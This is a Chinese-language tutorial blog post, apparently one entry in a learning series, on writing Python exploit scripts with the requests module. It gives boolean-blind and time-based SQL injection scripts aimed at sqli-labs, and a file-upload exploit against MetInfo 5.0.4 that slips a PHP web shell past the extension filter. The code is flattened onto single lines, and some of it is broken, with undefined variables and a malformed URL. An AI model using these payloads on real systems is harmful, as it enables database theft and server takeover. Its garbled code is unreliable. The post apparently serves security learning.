目錄

python 編寫exp

用python腳本實(shí)現(xiàn)布爾盲注

用python腳本實(shí)現(xiàn)延時(shí)注入

文件上傳

---

?

python 編寫exp

exp：漏洞利用工具

以Web 漏洞為主

要求：
1、能夠看懂別人寫的exp,并修改
2、能自己寫exp

基礎(chǔ)環(huán)境：python3

核心模塊：requests
requests模塊介紹詳細(xì)請(qǐng)看：https://blog.csdn.net/Waffle666/article/details/115720052

定制頭部

重新定義User-Agent 信息

超時(shí)

GET 傳參

POST 傳參

文件上傳

cookie 信息

?

用python腳本實(shí)現(xiàn)布爾盲注

以sqli-labs第八關(guān)為例

import requests import stringurl = "http://192.168.3.102:82/Less-8/"normalHtmlLen = len(requests.get(url=url+"?id=1").text)print("The len of HTML: "+str(normalHtmlLen))dbNameLen =0while True:dbNameLen_url = url+"?id=1'+and+length(database())="+str(dbNameLen)+"--+"#print(dbNameLen_url)if len(requests.get(dbNameLen_url).text) == normalHtmlLen:print("The len of dbNameLen: "+str(dbNameLen))breakif dbNameLen == 30:print("ERROR!")breakdbNameLen +=1dbName=""for i in range(1,9):for a in string.ascii_lowercase:dbName_url = url+"?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+"#print(dbName_url)if len(requests.get(dbName_url).text) == normalHtmlLen:dbName +=aprint("The dbName :"+dbName)break

用python腳本實(shí)現(xiàn)延時(shí)注入

以sqli-labs第九關(guān)為例

import requests import stringurl = "http://192.168.3.102:82/Less-8/"def timeOut(url):try:res = requests.get(url,timeout=3)return res.textexcept Exception as e:return "timeout"dbNameLen = 0while True:dbNameLen +=1dbNameLen_url = url+"?id=1'+and+if(length(database())="+str(dbNameLen)+",sleep(5),1) --+"#print(dbNameLen_url)if "timeout" in timeOut(dbNameLen_url):print("The Len of dbName: "+str(dbNameLen))break;if dbNameLen == 30:print("ERROR!")break;dbName = ""for i in range(1,dbNameLen+1):for char in string.ascii_lowercase:dbName_url = url+"?id=1'+and+if(substr(database(),"+str(i)+",1)='"+char+"',sleep(5),1)--+"#print(dbName_url)if "timeout" in timeOut(dbName_url):dbName +=charprint("The dbName :"+dbName)break;

文件上傳

以Metinfov5.0.4為例，

import requests import sysurl = sys.argv[1]postUrl = urL+"http://192.168.1.200/metinfov504/metinfov504/admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=123.com&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp"upFile = {"FileData":open(path,"rb")}res = requests.post(url=postUrl,files=upFile)print("The Shell path:"+url+res.text[4:])

?

?

?

總結(jié)

以上是生活随笔為你收集整理的【CyberSecurityLearning 68】python 编写exp的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。